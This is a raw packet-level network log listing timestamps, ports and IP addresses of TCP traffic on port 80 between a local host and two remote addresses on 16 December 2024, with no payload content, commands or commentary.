Dec 16, 2024 11:03:32.195307970 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.195331097 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.195331097 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.195349932 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.195362091 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.195367098 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.195383072 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.195384026 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.195394039 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.195409060 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.195425034 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.195436954 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.195441008 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.195456982 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.195481062 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.195503950 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.196101904 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.196119070 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.196134090 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.196154118 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.196157932 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.196176052 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.196187973 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.196192026 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.196208000 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.196223974 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.196225882 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.196239948 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.196249962 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.196257114 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.196266890 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.196274042 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.196290970 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.196305990 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.196309090 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.196348906 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.197035074 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.197052956 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.197067976 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.197099924 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.197124958 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.197298050 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:32.197313070 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.197329044 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.197365999 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.197382927 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.197455883 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.197473049 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.197488070 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.197504997 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.197513103 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.197519064 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:32.197539091 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.197580099 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.197604895 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:32.198014021 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.198036909 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.198085070 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.198810101 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.198832035 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.198894978 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.198894978 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.199027061 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:32.199045897 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.199069023 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.199089050 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.199105978 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.199109077 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.199120998 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.199131966 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.199162006 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.199162006 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.199167967 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.199188948 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.199188948 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.199212074 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.199218988 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.199233055 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.199239969 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.199254990 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.199255943 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.199276924 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.199296951 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.199310064 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.199331045 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.199341059 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.199361086 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.199373960 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.199383020 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.199398041 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.199403048 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.199418068 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.199424028 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.199449062 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.199471951 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.199506998 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.304589987 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.304645061 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.304728031 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.304925919 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.305079937 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.305150032 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.305977106 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.306114912 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.306145906 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.306185007 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.307240963 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.307307959 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.307404041 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.307470083 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.308156967 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.308212042 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.308255911 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.308321953 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.309226990 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.309349060 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.309407949 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.310305119 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.310360909 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.310425997 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.310477972 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.311419964 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.311475992 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.311512947 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.311803102 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.312593937 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.312664986 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.312685966 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.312736034 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.313601017 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.313658953 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.313709021 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.313874006 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.314697981 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.314752102 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.314801931 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.314902067 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.315745115 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.315819979 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.315943956 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.316018105 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.316881895 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.317002058 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.317054987 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.317926884 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.317990065 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.318068981 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.318123102 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.319125891 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.319161892 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.319176912 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.319205999 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.319855928 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:32.319933891 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:32.320112944 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:32.320183992 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.320218086 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.320240021 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.320240021 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:32.320270061 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.321564913 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.321682930 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.321736097 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.322256088 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.322305918 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.322410107 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.322454929 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.323292971 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.323340893 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.323431969 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.323473930 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.324368000 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.324413061 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.324489117 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.324534893 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.325463057 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.325608969 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.325655937 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.326545954 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.326602936 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.326684952 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.326736927 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.327668905 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.327730894 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.327775002 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.327821016 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.328706026 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.328768015 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.328821898 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.328865051 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.329783916 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.329983950 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.330035925 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.330924988 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.330977917 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.331062078 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.331106901 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.332029104 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.332079887 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.332102060 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.332145929 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.333050966 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.333199024 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.333251953 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.334212065 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.334261894 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.334325075 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.334372044 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.335227013 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.335269928 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.335318089 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.335365057 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.336285114 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.336334944 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.336407900 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.336452007 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.337388992 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.337502003 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.337558985 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.338474989 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.338531971 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.338547945 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.338599920 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.339551926 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.339603901 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.339649916 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.339694977 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.340637922 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.340687037 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.340763092 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.340804100 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.341718912 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.341809988 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.341860056 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.342822075 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.342895985 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.342899084 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.342943907 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.343910933 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.343977928 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.344016075 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.344111919 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.344990015 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.345006943 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.345061064 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.346128941 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.346237898 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.346298933 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.347193956 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.347245932 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.347249031 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.347291946 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.348217964 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.348273993 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.348323107 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.348365068 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.349287987 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.349410057 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.349457979 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.350594997 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.350641966 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.350678921 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.350722075 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.351473093 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.351552963 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.351574898 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.351591110 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.352551937 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.352602005 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.352660894 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.352705956 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.353666067 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.353780985 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.353853941 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.354724884 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.354789972 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.354815960 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.354867935 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.355788946 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.355849981 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.355895042 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.355947018 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.356879950 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.356942892 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.356982946 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.357034922 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.357975960 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.358192921 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.358247995 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.359117985 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.359181881 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.359221935 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.359266996 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.360183001 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.360244989 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.360342979 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.360395908 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.361323118 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.361382008 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.361387014 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.361432076 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.362318993 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.362417936 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.362479925 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.363442898 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.363502979 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.363528967 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.363584042 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.364491940 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.364552975 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.364592075 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.364644051 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.365554094 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.365677118 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.365741014 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.366633892 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.366693974 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.366734028 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.366791010 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.367719889 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.367783070 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.367841959 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.367894888 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.368834019 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.368892908 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.369085073 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.369138002 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.369895935 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.370023012 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.370085001 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.370953083 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.371015072 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.371082067 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.371135950 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.372103930 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.372159958 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.372184038 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.372236013 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.373121977 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.373188019 CET	49833	80	192.168.2.5	31.41.244.11
